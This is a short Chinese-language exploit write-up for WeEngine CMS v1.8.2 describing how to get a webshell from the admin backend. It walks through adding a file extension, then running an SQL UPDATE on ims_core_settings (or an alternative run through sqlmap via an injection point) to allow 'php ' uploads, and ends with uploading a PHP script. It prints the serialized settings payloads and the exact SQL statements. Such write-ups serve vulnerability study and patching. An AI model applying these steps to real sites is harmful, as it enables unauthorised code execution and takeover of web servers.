微擎cms v1.8.2 后台getshell¶
一、漏洞简介¶
二、漏洞影响¶
v1.8.2(201812130002)
三、复现过程¶
站点-附件设置-支持文件后缀
在安装完成的时候,数据库里面并没有写入支持文件后缀的值,需要我们进行添加需要的脚本格式php等等
直接写上支持的后缀为php是会带入到数据库的,提交完毕以后数据库会显示可上传的值
a:3:{s:16:"attachment_limit";
i:0;s:5:"image";a:5:{s:5:"thumb";i:0;s:5:
"width";i:800;s:10:"extentions";
a:4:{i:0;s:3:"gif";i:1;s:3:"jpg";i:2;s:4:"jpeg";i:3;s:3:"png";}
s:5:"limit";i:5000;s:14:"zip_percentage";s:3:"100";}
s:5:"audio";a:2:{s:10:"extentions";a:1:{i:0;s:3:"mp3";}s:5:"limit";i:5000;}}
漏洞利用¶
写入任意字符
a:3:{s:16:"attachment_limit";i:0;s:5:"image";
a:5:{s:5:"thumb";i:0;s:5:"width";i:800;s:10:"extentions";
a:5:{i:0;s:3:"gif";i:1;s:3:"jpg";i:2;s:4:"jpeg";i:3;
s:3:"png";i:4;s:3:"aaa";}s:5:"limit";i:5000;
s:14:"zip_percentage";s:3:"100";}s:5:"audio";
a:2:{s:10:"extentions"; a:1:{i:0;s:3:"mp3";}s:5:"limit";i:5000;}}
站点-常用工具-数据库-执行SQL语句替换之前插入的值 (记得打开调试模式)
UPDATE ims_core_settings SET value = replace(value, 'aaa', 'php ')
注意php后有一个空格
or 如果在渗透过程中有SQL注入点的情况下 有用户权限能够上传,尝试直接在SQLMAP执行语句
UPDATE `ims_core_settings` SET
`key` = 'upload',
`value` = 'a:2:{s:5:\"image\";a:4:{s:5:\"thumb\";i:0;
s:5:\"width\";i:800;s:10:\"extentions\";
a:5:{i:0;s:3:\"gif\";i:1;s:3:\"jpg\";i:2;
s:4:\"jpeg\";i:3; s:3:\"png\";i:4;s:3:\"php \";}
s:5:\"limit\";i:5000;}s:5:\"audio\";
a:2:{s:10:\"extentions\";a:1:{i:0;s:3:\"mp3\";}s:5:\"limit\";i:5000;}}'
WHERE `key` = 'upload' AND `key` = 'upload' COLLATE utf8mb4_bin;
a:3:{s:16:"attachment_limit";i:0;s:5:"image";
a:5:{s:5:"thumb";i:0;s:5:"width";i:800;s:10:"extentions";
a:5:{i:0;s:3:"gif";i:1;s:3:"jpg";i:2;s:4:"jpeg";i:3;
s:3:"png";i:4;s:3:"php ";}s:5:"limit";i:5000;
s:14:"zip_percentage";s:3:"100";}s:5:"audio";
a:2:{s:10:"extentions";a:1:{i:0;s:3:"mp3";}s:5:"limit";i:5000;}}
执行完毕-系统-更新缓存
上传php文件
以上全部操作完毕,直接在可以上传图片的地方进行上传脚本
四、参考链接
https://www.vulnbug.com/Exploit/getshell-vulnerability-in-microcomputer-cms-background.html